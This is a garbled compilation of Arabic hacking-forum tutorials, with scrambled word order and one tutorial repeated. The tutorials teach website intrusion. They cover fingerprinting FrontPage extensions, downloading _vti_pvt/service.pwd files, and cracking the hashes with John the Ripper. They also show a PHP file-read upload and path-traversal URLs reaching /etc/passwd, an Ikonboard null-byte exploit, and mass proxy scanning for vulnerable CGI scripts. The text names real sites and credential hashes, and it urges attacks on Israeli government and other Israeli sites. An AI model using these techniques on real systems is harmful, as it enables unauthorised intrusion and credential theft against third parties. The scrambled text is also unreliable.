../shtml.exe ../fpcount.exe
: vti_pvt_ المجلد *
التالية الملفات هو منها يهمنا ما ملفات عدة بداخله يتواجد : و
الخاصة : service.pwd الملف - المرور كلمة و المعرف يتواجد فيه وبمقياس . DES بالمشرفمشفرة
و : service.grp الملف - مشرفين من المعرفين يتواجد فيه وauthors .
مسارات : doctodep.btr و deptodoc.btr ملفي - يتواجد فيه وفتستطيع بتنزيله قمت فاذا ، الخادم على تحميلها تم التي الملفات
الملفات معرفةبالموقع . الموجودة
المجلد في يوجد اذ المجلد محتويات معاينة تستطيع ال الغالب في وملف للموقع و ) htaccess. الرئيسي المالك الجميع بمنع يقوم
و المجموعةمحتوياته ( و المجلد معاينة من . الزوار
تعتبر : ( بأنها يعني المجلدال على صالحية أي وضع عدم ان مالحظةالناحية ضعفمن لكن و ) ثغرة
: private_ المجلد *
هو فقط واحد ملف بداخله يتواجد . htaccess. و
الـ @ عمل آلية هي ؟ FrontPage Extension Server ما
الـ و العميل بين االتصال على FrontPage Extension Server يعتمدالـ . HTTP بروتوكول
الـ برنامج طريق عن الزوار عداد معاينة اردنا فانه FrontPage فلوطلب ارسال بالـ Request يتم الخادم يمرره ثم FrontPage للخادم
Extension Server مثل الخادم ببرمجيات بالتالي يمرره الذي ، fpcount.exe و ثم من والـ إلى أخرى مرة تمريره و Extension Server يكرر الخادم إلى و
المخرجات يظهرنار جدار عبر تتم االتصاالت هذه ان علما ، العميل . لـ
بـ @ االتصال : FrontPage Extension Server كيفية
، العمالء لراحة تسعى التسكين أغلبشركات ان سابقا ذكرنا كماالـ خدمة تدعم للموقع FrontPage فتجدها الصفحات لتحميل ذلك و
بأنها علماالـ بروتوكول عبر FTP تدعم المجلدات انشاء و الملفات تحميل و
الخادم بناحية تعمل التي البرمجيات على اعتمادا . المتصفحبالـ االتصال كيفية لمعرفة التالي بتنفيذ قم اآلن FrontPage و
Extension Server :
الـ : ( حزمة عن حاليا سأتكلم عن XP مالحظة أبدا تختلف ال التي والشكلية النقاط بعض في إال الباقية ) الحزم
الـ * برنامج بتشغيل حزمة FrontPage قم مع مرفقا يأتي الذي وOffice .
قائمة * باختيار File من . Open Web قمالمشفرة ) ( * ليست و األصلية المرور كلمة و المعرف باضافة . قمعندها * و كلها الموقع ملفات الخادم لك سيظهر كانتصحيحة اذا
معاينة و المجلدات و الملفات في التعديل و التحميل تستطيعالمصدرية الشفرة
. للملفاتأو * الخدمة يدعم ال الموقع بأن يعني فهذا بنجاح العملية تتم لم اذا
وضعية في معاينتها منك يطلب و خاطئة المرور كلمة أو المعرف أنال و القراءة
التي الملفات و المجلدات وال األصلية المصدرية الشفرة لك يظهرالموقع . يحويها
الـ @ يدعم الموقع هل معرفة ال FrontPage كيفية : أم
بيج الفرونت لدعم الموقع قابلية لمعرفة الطرق من العديد يوجدمنها : نذكر
التثبيت * نجاح ملف : معاينة
ملف : ( تجد ال قد أن vti_inf.html_ مالحظة يعني ال هذا لكن وثغرة يعتبر ال أنه كما ، الخدمة يدعم ال ) الموقع
الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قمFrontPage ال . أم
ملف - بمعانية بارفاقه vti_inf.html_ قم ذلك و المتصفح بواسطةمثال ، الموقع : بعنوان
http://www.Victim.com/_vti_inf.html
جملة - ستجد الصفحة معاينة عند FrontPage Configuration وInformation ، الـ حزمة أن معناه FrontPage Extension Server فهذا
تثبيتها تم قدبنجاح الخادم . في
بالتالي قم الخدمة اصدارة لمعرفة : و
باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode .
بالبحثعن - لالصدار Version حيث "FPVersion="Version قم تشيربالخدمة . الخاص
مجلد * طريق : vti_cnf_ عن
الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قم
FrontPage ال . أمبعنوان - بارفاقه ذلك و المتصفح بواسطة المجلد بمعانية قم
مثال ، : الموقع
http://www.Victim.com/_vti_cnf
باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode .
التالية - الشفرة عن بالبحث : قم
vti_generator:Programe
حالتنا Programe حيث - في سيكون و اصدارته و البرنامج لنوع يشيرهي Microsoft FrontPage X هو به الخاصة االصدارة . X و
للصفحة * المصدرية الشفرة : الكشفعن
الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قمFrontPage ال . أم
باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode .
الرأس - ترميزي بين بالبحث التالية >Head<>/Head< قم الشفرة عن:
>**** Name="GENERATOR" &@#&@#&@#&@#&@#&@#&@#="Programe"<
هو Programe حيث - البرنامج كان اذا و البرنامج لنوع يرمزMicrosoft FrontPage X.0 يدعم بالموقع الخاص الخادم بأن لنا يتبين
و بيج الفرونتهي به الخاصة . X االصدارة
موقع * طريق : NetCraft عن
الموقع - بزيارة . NetCraft.net قمالـ - مستثنيا الموقع عنوان بكتابة . //:http قم
ثواني - بضع . انتظرالخدمات - و الملقم عن المعلومات بعض أعطاك الموقع أن ستجد
من و ، للبرنامج دعمه قابلية معرفة تريد الذي الموقع في الموجودةالخدمات تلك
الـ بالشكل FrontPage خدمة لك ستظهر X حيث mod_frontpage/X والـ الصدارة . FrontPage Extensions Server يرمز
الـ * طريق : Telnet عن
عن : ( المعلومات بعض معرفة في الطريقة هذه تساعد مالحظةالسابقة الطريقة نفسمخرجات هي المخرجات و ) الخادم
قائمة - باختيار Start من ستظهر Run قم التي بالنافذة اكتب وTelnet .
المنفذ - عبر بالموقع باالتصال التالي 80قم بالشكل :
Microsoft Telnet< Open www.Victim.com 80
طلب - بارسال الطريقة Request قم لتكن و هي Method للخادمHead .
بروتوكول : ( مع التعامل بكيفية االلمام عليك ) HTTP مالحظة
حيث - التالي بارسال http://www.Victim.net قم الضحية الموقع هوالخاصبك ISP.net و الخدمة بمزود الخاص البروكسي : هو
Head www.Victim.net HTTP/1.1 Host: ISP.net
Accept: */* Connection: close
ثواني - بضع . انتظراالجابة - للخادم Response ستستلم ارسلتهب الذي الطلب عنServer الخدمات و الملقم نوع و للصفحة تعديل آخر تاريخ مثل
به . المتوفرةالطريقة في وجدناه نفسالذي ستجد الخدمات ضمن من و
الـ خدمة أن هو و بالشكل FrontPage السابقة لك ستظهر وmod_frontpage/X
الـ X حيث الصدارة . FrontPage Extensions Server يرمز
صالحك @ في ليصبح استغالله : كيفية
على صالحيات وضع يتم لم و الخدمة هذه يدعم موقع على عثرت اذاالـ بالتالي vti_pvt_ مجلد : قم
حالتنا : ( في و الخادم ناحية على تعمل بلغة االلمام عليك مالحظةالـ ، PHP فهي اللغة هذه دعم الضحية الموقع على أن ) كما
الضحية * بالموقع باالتصال . قمبـ * امتداده ينتهي ملف بتحميل التالي PHP قم ضمنه : و
>?PHP
$open = FOpen)$file, "r"(; $get = FGets)$open, FileSize)$file((;
Echo $get;
FClose $open;
?<
ملف برفع هنا قمنا ثم PHP و معين غير ملف بفتح يقوم للخادميغلق ثم يعرضه ثم بالبايت حجمه حسب على محتوياته يحضر
كل اآلن و ، الملفبـ الحاقه و المتصفح عبر الموقع على الدخول هو اآلن فعله عليك ما
المتغير و حملته الذي الملف معاينة file بعنوان تريد الذي الملف و الشفرة
مثال ، به الخاصة : المصدرية
http://www.Victim.com/uploded_file...../../etc/passwd
و uploded_file حيث ، بتحميله قمت الذي الملف السم يشيرالمجلدات و الملفات بمعاينة لك تسمح اوامر اضافة تستطيع
الخادم في . الموجودة
،،،انتهى
بيج " الفرونت تدعم التي المواقع " اختراق
> إعصار منتدى من >منقول> المدمر: >الكاتب
بنظام خاصة الثغرة هذه ان يعلم منا //اكثر
NT - Unix
تدعم -1 المواقع هذه هل لمعرفة طريقة بشرح اآلن أقوم وسفfrontpage ال؟ أم
األسهل إال أذكر ولن طرق :بعدة
موقع - إلى netcraft بالذهابhttp://www.netcraft.com/
يظهر البحثسوف وبعد الموقع اسم وكتابةmod_frontpage/x
x=) بيج بالفرونت الخاص اإلصدار )رقمجملة - إضافة طريق عن
vti_inf.html_/لنفرضأن الموقع عنوان بعد
/http://www.almodammer.com:الموقعالطريقة بهذه ليصبح الجملة نضيف
http://www.almodammer.com/_vti_inf.htmlاضغط Enter وبعدها
الكلمة هذه الصفحة أول في يطلعلك وراحFrontpage Configuration Information
بيج الفرونت وبرامج مجلدات تثبيت تم قد أيال - أم بيج الفرونت يدعم الموقع معرفة تستطيع وأيضا
بإضافةvti_cnf_/
المثال كهذا الموقع عنوان :بعدhttp://www.almodammer.com/_vti_cnf
واختار األيمن الفأرة زر واضغط
source المصدروابحثعن
vti_generator:Programeحيث
Programe به الخاصة واإلصدارات بيج الفرونت برنامج لنوع تعني
--------------------------------------------------
يدعم -2 الموقع وعرفنا لملف frontpage ألحين نوصل نقدر كيفالباسوورد؟
يبدعم الي الموقع هات إنت واعلمك frontpage بسيطةالمثال سبيل وعلى يعني
http://www.almodammer.com/ملف fontpage يدعم إلى نذهب _vti_pvt طيب
يعني كذاhttp://www.almodammer.com/_vti_pvt
تأتي التي الملفات وأهم عديدة ملفات وجود نالحظ ماندخله وأول:باسم
=============Adminstrator.pwdAdminstrators.pwd
Service.pwdUsers.pwdUser.pwd
Author.pwd=============
وجود نالحظ نالحظ ماذا الملفات هذه أحد فتحنا إننا لنفرض ألحينusername:passwd
والباسوورد المستخدم اسماشوف ابي جيت ولما بيج بالفرونت موقع اخترقت انا يعني
ملف طلعلي على service الملفات user / password يحتويالملف مضمون وهذا
operator:hi9LHn9wAMuKMالمستخدم اسم operator:حيث
هي المشفرة hi9LHn9wAMuKM:الباسوورد
إال ماباقي المشفر الباسوورد نطلع كيف يااخواني وعرفنا ألحينتشفيره نفك
كثير ببرامج يتم وهذا=)Crack Jack(=
=)John The Ripper(=
وهو تداوال واألكثر األفضل نستخدم راحJohn The Ripper
الموقع هذا من البرنامج ::لتحميلhttp://www.openwall.com/john
البرنامج بهذا التشفير تفك كيف
مجلد إلى البرنامج تنقل تروح شي أول\:c
مجلد تفتح RUN بعديننصي مستند الملف txt وتسويلك كلمة passwd وتسمي فيه وتضع
تشفيرها تفك تبي الي السرإلى إذهب
start ابدأ run تشغيل
األمر اكتبcommand
على يفتح Enter اضغط راح وبعدهاالـ DoSإطار
مجلد إلى RUN اذهبمن تطلع تبي واذا لك تظهر راح الي المجلدات من بالخروج وذلك
األمر استخدم مجلد أي..cd
توصل حتى>\:cاكتب بعدين
cd johnعلى Enter اضغط
الشكل بهذا لك يظهر وراح>c:\john واكتبcd RUN
الطريقة بهذه ليصبح المجلد وبتدخل>c:/john/RUN
برنامج أوامر نكتب John The Ripper ألحينوهي====
john -i:all passd.txt--------------------------
واالحتماالت األنواع جميع عن لك يبحث
====john -i:Alpha passwd.txt ----------------------------------
الصغيرة األحرف عن يبحث
====john -i:Digits passwd.txt ----------------------------------
األرقام عن يبحث
====john -single passwd.txt ---------------------------------
المستخدم اسم تطابق التي الباسووردات عن لك يبحث أمر
--------------------------------------------------------------------------------
فكيت إنت هل تشوف تبي وإذا األوامر هذي كل ماتجرب وبعدإلى إذهب أل وال الباسوورد وكسرت
john.potفك وبعد الباسوورد لك يعرض وراح البرنامج داخل الموجود
تشفيرها--------------------------------------------------------------------------------
عندك مستريح ألحين passwordوالـ username إنت؟ !!وشبقالك
من وأحسنها طرق بعدة دخوله ألحين لعب بالموقع تلعب /يقالك)1(
frontpage بعدين
file إلى وتذهبopen web وتضيف
على الملفات تعدل تقدر الحين انت كذا وعاد والباسوورد االسمكيفك
)2(FTP من
الـ ببرامج المنتشرة FTPوعليكws-ftpكالـ pro ftpوالـ... والمزيد
من الطريقة عمل لك DOS ويمكنك وأضمن لك أسهل البرامج ولكن
======================================
روحوا أقولكم موقع على تجربون تبون أكيد google وألحينhttp://www.google.com/
البحث إطار في واكتبواvti_pvt_/
الثغرة هذه على تحتوي كثيرة مواقع تطلعلك وراح
بحث محرك وعندكhttp://www.altavista.com/
البحث محرك في تكتبlink:service.pwd
..أوlink:adminstrators
وجود االحتمال الملفات من .فيها password وغيرها
،،،انتهى
بيج " الفرونت تدعم التي المواقع " اختراق
> إعصار منتدى من >منقول> المدمر: >الكاتب
بنظام خاصة الثغرة هذه ان يعلم منا //اكثر
NT - Unix
تدعم -1 المواقع هذه هل لمعرفة طريقة بشرح اآلن أقوم وسفfrontpage ال؟ أم
األسهل إال أذكر ولن طرق :بعدة
موقع - إلى netcraft بالذهابhttp://www.netcraft.com/
يظهر البحثسوف وبعد الموقع اسم وكتابةmod_frontpage/x
x=) بيج بالفرونت الخاص اإلصدار )رقمجملة - إضافة طريق عن
vti_inf.html_/لنفرضأن الموقع عنوان بعد
/http://www.almodammer.com:الموقعالطريقة بهذه ليصبح الجملة نضيف
http://www.almodammer.com/_vti_inf.htmlاضغط Enter وبعدها
الكلمة هذه الصفحة أول في يطلعلك وراحFrontpage Configuration Information
بيج الفرونت وبرامج مجلدات تثبيت تم قد أيال - أم بيج الفرونت يدعم الموقع معرفة تستطيع وأيضا
بإضافةvti_cnf_/
المثال كهذا الموقع عنوان :بعدhttp://www.almodammer.com/_vti_cnf
واختار األيمن الفأرة زر واضغطsource المصدر
وابحثعن vti_generator:Programe
حيثPrograme به الخاصة واإلصدارات بيج الفرونت برنامج لنوع تعني
--------------------------------------------------
يدعم -2 الموقع وعرفنا لملف frontpage ألحين نوصل نقدر كيفالباسوورد؟
يبدعم الي الموقع هات إنت واعلمك frontpage بسيطةالمثال سبيل وعلى يعني
http://www.almodammer.com/ملف fontpage يدعم إلى نذهب _vti_pvt طيب
يعني كذاhttp://www.almodammer.com/_vti_pvt
تأتي التي الملفات وأهم عديدة ملفات وجود نالحظ ماندخله وأول
:باسم=============
Adminstrator.pwdAdminstrators.pwd
Service.pwdUsers.pwdUser.pwd
Author.pwd=============
وجود نالحظ نالحظ ماذا الملفات هذه أحد فتحنا إننا لنفرض ألحينusername:passwd
والباسوورد المستخدم اسماشوف ابي جيت ولما بيج بالفرونت موقع اخترقت انا يعني
ملف طلعلي على service الملفات user / password يحتويالملف مضمون وهذا
operator:hi9LHn9wAMuKMالمستخدم اسم operator:حيث
هي المشفرة hi9LHn9wAMuKM:الباسوورد
إال ماباقي المشفر الباسوورد نطلع كيف يااخواني وعرفنا ألحينتشفيره نفك
كثير ببرامج يتم وهذا=)Crack Jack(=
=)John The Ripper(=
وهو تداوال واألكثر األفضل نستخدم راحJohn The Ripper
الموقع هذا من البرنامج ::لتحميلhttp://www.openwall.com/john
البرنامج بهذا التشفير تفك كيف
مجلد إلى البرنامج تنقل تروح شي أول\:c
مجلد تفتح RUN بعديننصي مستند الملف txt وتسويلك كلمة passwd وتسمي فيه وتضع
تشفيرها تفك تبي الي السرإلى إذهب
start ابدأ run تشغيل
األمر اكتبcommand
على يفتح Enter اضغط راح وبعدهاالـ DoSإطار
مجلد إلى RUN اذهبمن تطلع تبي واذا لك تظهر راح الي المجلدات من بالخروج وذلك
األمر استخدم مجلد أي..cd
توصل حتى
>\:cاكتب بعدين
cd johnعلى Enter اضغط
الشكل بهذا لك يظهر وراح>c:\john واكتبcd RUN
الطريقة بهذه ليصبح المجلد وبتدخل>c:/john/RUN
برنامج أوامر نكتب John The Ripper ألحينوهي====
john -i:all passd.txt--------------------------
واالحتماالت األنواع جميع عن لك يبحث
====john -i:Alpha passwd.txt ----------------------------------
الصغيرة األحرف عن يبحث
====john -i:Digits passwd.txt ----------------------------------
األرقام عن يبحث
====john -single passwd.txt ---------------------------------
المستخدم اسم تطابق التي الباسووردات عن لك يبحث أمر
--------------------------------------------------------------------------------فكيت إنت هل تشوف تبي وإذا األوامر هذي كل ماتجرب وبعد
إلى إذهب أل وال الباسوورد وكسرتjohn.pot
فك وبعد الباسوورد لك يعرض وراح البرنامج داخل الموجودتشفيرها
--------------------------------------------------------------------------------
عندك مستريح ألحين passwordوالـ username إنت؟ !!وشبقالك
من وأحسنها طرق بعدة دخوله ألحين لعب بالموقع تلعب /يقالك)1(
frontpage بعدين
file إلى وتذهبopen web وتضيف
على الملفات تعدل تقدر الحين انت كذا وعاد والباسوورد االسم
كيفك
)2(FTP من
الـ ببرامج المنتشرة FTPوعليكws-ftpكالـ pro ftpوالـ... والمزيد
من الطريقة عمل لك DOS ويمكنك وأضمن لك أسهل البرامج ولكن
======================================
روحوا أقولكم موقع على تجربون تبون أكيد google وألحينhttp://www.google.com/
البحث إطار في واكتبواvti_pvt_/
الثغرة هذه على تحتوي كثيرة مواقع تطلعلك وراح
بحث محرك وعندكhttp://www.altavista.com/
البحث محرك في تكتبlink:service.pwd
..أوlink:adminstrators
وجود االحتمال الملفات من .فيها password وغيرها21. العشوائي " اإلختراق
>منقول<> الكندور: >الكاتب
العشوائي - الـإختراق Random Hacking ماهوالـ - غير إستثمارات على يبحث يصبح بحيث CGIScripts تطويره
عليها - الحصول بعد ثغره اي تستغل كيف
العشوائي - الـإختراق Random Hacking ماهوسهل وهذا ، محدده ثغره عن المواقع من كبيره كميه في البحث هوروح ، جدا بسيط مثال ، لإلختراق جاهزه جدا كثيره بمواقع ويعود
الـ على تعتمد التي البحث محركات من ، بحث محرك spiders علىمثل العناكب ، link:xxxx.cgi or pl وأكتب altavista.com أو إرجع(
البحث رياضيات في زورو بإسم )لشرح لملف لنك عن نبحث مثالhelp.cgi ، link:help.cgi كلها للبحث نتيجه لك المردوده المواقع
منتدى ، Ikonboard تملك الكود المصدر في وأبحث منها واحد إفتحHTML عنه بحثت الذي السكربت ، help.cgi عن مكانه اين لتعرف
هنا http://www.example.com/cgi-bin/help.cgiلنفرضمكانهليصبح العنوان غير الملف بعد -http://www.example.com/cgi أكتب
bin/help....on=../members/[member].cgi%00تغيير مالحظه طبعا [] [member] مع القوسين وبدون عضو بإسم
المرور كلمة ظمنها ومن كامله العضو معلومات يعرضلك سوفالمنتدى لـ الثغره موضوعي Ikonboard 2.1.7 وهذه ليسلب وهذا
فقط مثال أبسط أحضرت ألني تحفظه ال ومثال بدايه هي ولكنالـ ملفات آالف بل مئات غيره مثل CGIScript فيوجد ثغرات تملك
خالل من تكون إستثماراتها واغلب url هذهآي جي السي ملفات لثغرات اإلستثمارات هذه مثل على للحصوليهم ما ولكن أعتقد روسيه لغته وهو هذا األرشيف سكريبتشوف
الـ عن نبحث اإلستثمار Exploit ألننا أوhttp://www.secure.f2s.com/eng_ver/bugs/البحث محرك في وتضعه مثال المنتج إسم تأخذ وممكن
/http://www.securiteam.com لـ في تشترك أو ، النتائج وتشوفشاركتمن أنا جدا مفيده فوكسفهي سيكيورتي لـ البريده القائمه
لـثغرات وليس األمن في مختصه وهي بها أعجبت وجدا فتره قبلبرنامج .... ويوجد شئ وكل واخبار امن يعني ، سكربت آي جي السي
هو ، فوكسبيجر سيكيورتي بإسم فوكسي سيكيورتي تقدمه... الخ ووو األخبار على الحصول عمليه لتسهيل برنامج
الـ - غير إستثمارات على يبحث يصبح بحيث CGIScripts تطويرهموقع اي تخترق يعني ، عشوائي فعال كان إذا العشوائي اإلختراق
أنه !! في إحنا منه نستفيد ممكن لكن ، همجيه فهذه سبب بدون ولواللي إسرائيل مثال ، كيف لك اقول أنا ، همجي شكل في يكون ما
النار إطالق بأوقاف الفلسطينيين يأمرون الذين ، يكرهها ، الكل ظلموا ألنهم نكرههم ال ، يهود أنهم ليسألجل يكرههم الكل
هو هذا مواقعهم من آالف فيه موقع عندهم ، 12610فلسطين sites بـ 1104و co.il تنتهي sites بـ 70و org.il تنتهي sites بـ و ac.il تنتهي
78 sites. بـ و gov.il تنتهي ، مهمه 54وهذه sites. بـ 29و net.il تنتهي sites. بـ 2009و muni.il تنتهي sites بـ ، com تنتهي 137و sites.
بـ ، لعينه .edu - 4 sites و .org - 121 sites و net تنتهي israel.net - 84 sites. و il - sites. ........ روح السايت هذه كل على تحصل عشان
هذا http://iguide.co.il/sites/sites.htm الموقع
بحث محركات كمان وفيه
http://www.achla.co.il/http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/http://www.tapuz.co.il/http://www.walla.co.il/
http://www.info.gov.il/find.pl
هو واللي منها أعدم محرك altavista.co.il وفيه
هذه في الموجوده للبيانات فرز يصلح أن شخصمنا كل على المهمفرز يصلح برنامج ليصنع يتقنها التي اللغه يستخدم ، المواقع
معها ثانيه اشياء بدون تكست ملف في ويضعها
مثال ، منتج عن كلها فيها البحث هي الثانيه ، /w3-msql العمليهمثال بروكسي مع الشبك يتم أوال ، جدا سهله الطريقه
proxy.isp.net.sa :8080 أمر له يرسل ، GET وثم ترسل مثال للبروكسي
GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-saUser-Agent: Mozilla/4.0 )compatible; MSIE 5.5; Windows 98(
Host: www.com.ilProxy-Connection: Keep-Alive
الموقع أحضار البروكسي من يطلب -http://www.com.il/cgi وهوbin/ ، لـ طلبنا ، /cgi-bin/w3-msql يتضح نبحثعن ال الحقيقه في
بها يوجد التي المواقع كل عن نبحث ولكن ، آي جي ثغراتسي، WWWMSQL المنتج جمعناها التي مثال اإلسرائليه المواقع يعني
الذي البرنامج في وتدخل واحد واحد تأخذ كلها تكست ملف فيعن بحثا البروكسي الى وترسل وثم cgi-bin/w3-msql صممناه
كل من ننتهي حتى وهكذا ، خارجي ملف في البروكسي رد يحفظالمنتج إيجاد تم التي ونشوف الملف نفتح وثم ، المواقع
WWWMSQL فوكس سيكيورتي الى ونتوجه ، يوجد لم والتي داخهاوابحثعن يعجبك موقع أي واال تيم سيكيورتي ، w3-msql واال مثال
نجد تيم سيكوتي المتصفح w3-msql لـ Exploit في من تطبيقه يمكنهنا وهو ،http://www.securiteam.com/exploits/2WUQBRFS3A.htmlانا أسميها فيها منتج عن بحثا مواقع فحصعده Random طريقه
Hacking عن بحثت فعال لو ولكن ، عشوائي إختراق w3-msql يعنيلن أو كثير تلقى راح ما بأنك لك أقول فأنا اإلسرائليه المواقع فيتبحثعن ممكن ، شئ فيها /vti_pvt_/ تجد التي المواقع كل لترصد
من المسترجعه المعلومات كل حفظ يتم ما بعد وطبعا ، بيج فرونتبشكل تكون يكون HTML البروكسي الملف خل أنت كذا عشان
عنها html.* بنسق كتب اللي ، المواقع كل وتجد The page.. وافتحهcannot be displayed واللي Forbddien واللي ....not found .... ، الخ
مسموح غير ولكن موجود واال فاوند نت اللي تعرف الردود هذه منمو .. واللي عليه موجود اللي تعرف الطريقه بهذه الخ له بالوصول
عليك ..... والباقي موجود
عليها - الحصول بعد ثغره اي تستغل كيفكانت كود url إذا ، فلسفه لها يبغا قابلت c ما أو تشغله عرفت ومابلغه ولكن لـه ثاني فرجون عن تبحث فممكن أخطاء أو perl فيه
Shell *.sh يقابل الذي في Batch وهو عنها وتحدثنا ويندوز فيأكتب بيرل أكتيف تثبت ما الدوسبعد من ، البرمجه لغات perl كوكب
exploit.pl الـ كان تغييرها exploit إذا أشياء فيه طبعا ولكن بيرل بلغهعالمات بين مكتوبه تكون األشياء وهذه ، نفسه الكود في
في التعليقات ، بيرل في تعرفشئ ما إذا مشاكل بتواجه وأكيد بالصور تطلبشرح ال الناحيه قدرت هذه ما طويل رد لك رجع إذا
وإسم > مسافه وثم عالمة طريق عن الخرج تحفظ ممكن تقراهمثال perl exploit.pl < log.htm الملف
الـ بعض ألن ، مشاكل فيه تواجه فقط بيرل أكتيف للمنتج وبالنسبهExploit زين يعمل ما وممكن خمسه وممكن أربعه اإلصدار في كتب
في تعدل أو عندك المفسر لتغير تضطر قد لذلك بيرل أكتايف فيليونكس فكره وعلى ، اللغه في خبره يطلب كله وهذا أعمل( الكود
) RedHat 6.2 على بيرل أكتيف من افضل جدا ممتاز بيرل مفسر فيهالمرات .بعشرات
،،،انتهى
المواقع " اختراق في والمثلى الصحيحة " الطريقة
>منقول<> marwan911 :الكاتب<
المعلومات اخذ هي واللي االختراق في خطوة اول
والنظام عليه شغال اللي الملقم شنهو الفالني الموقع نعرف يعنييدعمها اللي .والخدمات
اثنين اشهرها الملقمات
IIS: ( . مقفلة قليل ومواقع ثغرات مليانة وهذه مايكروسوفت من ثغراتها(
apache: واختراقها العالم انحاء في متوزعين مبرمجين مجموعة منصعب .شبه
طيب
موقع عندنا الحين
كلها والمعلومات والخدمات والملقم التشغيل نظام نعرف وشلون
الموقع http://www.netcraft.net عندك
ادخله
مربع تالقي
فوق اللي المعلومات تعرف تبي اللي الموقع فيه تحط هنا
هو اللي االبيض البيت موقع نحط whitehouse.org مثال
غير: من نكتبه باالخير / //:http مالحظة اللي وال
http://uptime.netcraft.com/up/graph....whitehouse.org
التالي لنا يطلع راح
The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000
طيب
مهمتين معلومتين عرفنا الحين
الملقم على شغال انه شيء IIS5.0 اول
ويندوز نظام على شغال 2000ثانيشيء
حلو
ثغرات نجرب شيء ( IIS5.0 اول الموضوع ) بعد احطها راح عليه
ويندوز نظام ثغرات نشوف شيء مانفع الموقع ) 2000إذا احط راح ) الموضوع بعد
طيب
كود يوني اسمها حاجة فيه الحين
المتصفح طريق عن فيها تخترق هذه
ملقمات مع إال تحطها IIS وماتمشي طويلة عناوين عن عبارة وهي . عليها امثلة احط راح الموقع عنوان .بعد
ثغرات؟ فيها ماطلع انه لنفرض طيب
نفسه الموقع محتويات نشوف
من ثغراتها ونطلع او او او منتدى او زوار سجل عنده كان إن نشوفالموضوع بعد اللي الرد في ارفقه راح اللي .الموقع
اباتشي؟ السيرفر كان لو طيب
ارانك موقع مثال ناخذ www.arank.com خلونا
التالية النتيجة نشوف راح كرافت بالنيت حللناه لو
The site www.arank.com is running Apache/1.3.20 )Unix( mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
اشياء ثالث يهمنا هنا طيب
وهو بيج apache 1.3.20 الملقم فرونت دعم FrontPage/5.0.2.2510 ووهو النظام والثالث ثغرات مليانة Linux وهذه
طيب
الملقم
بعض إال اإلختراق الصعبة الملقمات من اباتشي شيء اولجنب على هذه فنحط منها .اإلصدارات
بيج الفرونت دعم نشوف
ثغرات مليان بيج الفرونت ماقلنا زي
تقريبا وكثيرة قوية وثغراته
مجلد فايدة private_ و vti_pvt_ منها مامنه غيره نحتاجها اللي هذه
وهي مهمة ملفات اربع نالقي راح المجلدين و service.pwd داخلusers.pwd و authors.pwd و adminstators.pwd اخطر هذا ويعتبر
ملف
هذه ) الثغرة مالحظة هذه الملفات من واحد ننزل قدرنا لو طيبب ( 70موجودة نفتحها% نزلناها لو عالنت الموجودة المواقع من
المثال سبيل على هذا السطر ونالقي بالمفكرةgoodyco:CalXS8USl4TGM
موقع من وهذا http://www.goody.com.sa/_vti_pvt/service.pwd قودي
الحين هو goodyco طيب واللي والباسسمشفر اليوزرCalXS8USl4TGM
اسمه ببرنامج ينفك ينفك؟ john the repaier وشلون
) الدوس ) وتفتح واحد بمجلد اليوزر مع المشفر الملف وتحط تنزلهالتالي السطر وتكتب جوهن لمجلد john -i PASSWORD.FILE وتروح
الباسس لك يطلع استناه وعاد
النظام هي واللي الثالثة للفقرة نروح طيب
لينكس هو النظام ماشفنا زي
كثير إصدارت منه وفيه ماندريك و هات ريد فيه لينكسايش؟ لكناكثر وثغرات
مشكلتين تواجهك راح هنا لكن
ول وتشغيل ابدا من تطلعه تقدر النظام معرفة شيء telnet اولوإصدارته نوعه فوق النظام لك يطلع الموقع عنوان واكتب
لينكساصال عندك يكون الزم الثانية المشكلة
ال بلغة ثغراته عاللينكسفقط c علشان إال ماتشتغل وهذه
================
http://neworder.box.sk/ فوق ) مثال تكتب جدا مفيد الموقع هذا) عاليمين اللي اي apache او IIS بالمربع او واصدارته منتدى او
ثغراته لك ويطلع برنامج
http://www.ussrback.com/ ل تروح جدا جدا خطير هذا الموقعEXPLOITS جميع ثغرات هنا اختيار اول وتختار عاليسار اللي
.. من ومنوعة الخ و و و ويندوز لينكسو من يوني perl و c االنظمة و.كود
،،،انتهى
المواقع " اختراق كيفية عن ومبسطة يسيرة " نبذه
> تن كويت منتديات من >منقول :الكاتب<
معي ركزللموقع . بأتجاه عليك المبتدئين بالذات الجميع يحير سؤال هذا
اختراقه المراداهمها عوامل عدة حيث من كامال الموقع دراسة عليك يجب حيث
الى ) -1 السيرفر وينقسم الموقع في والمستخدم السيرفر نظام نوعين
هو ( - االول النوع اس ( IIS ا اي ) اي
الثاني ( - النوع ) اباشي ( apachc ب
ال ) -2 ام الموقع في بحث محرك وجود مالحظة
الخمول ) -3 ووقت الموقع لزوار الذروه وقت معرفة
للموقع ) -4 األيبي معرفة
لتنفيذ جدا مطلوبه كعوامل المتخذه العوامل اهم هذه تقريباتاخذ وهذه العمليه
بالساهل مايجي شي كل ان حيث وقت
السيرفر وذكرنا تقريبا IIS سبق امره وهذا المواقع لبعض والداعمان حيث سهل
الهواه من هم الطريقه هذه يستعمل من اغلب
تكون بأن مرتبط ايضا واختراقها سهله تقريبا ثغرات ان حيثلديك التي الثغرات
طااازه و جديده
وسوف المساعده البرامج ببعض ثم بالله باألستعانه صبر وشويةنجاحاتك تححق
الله . بأذنالبحث apachc سيرفر على يعمل ال وغالبا جدا قوي السيرفر وهذا
ثغراته عن
له . من اال عملها يستطيع ال امور عدة يتطلب ألنه المحترفون سوى خبره
البرمجه بعضلغات ليونكسويعرف . بنظام،،،انتهى
" )> ج& للمبتدئين )>س المواقع اختراق " في
> مصر ابن منتدى من >منقول> العربي: القناص >الكاتب
العربي*: القناص أخي عليكم السالم سالمزيف*: العربي القناص أهلين D: ج
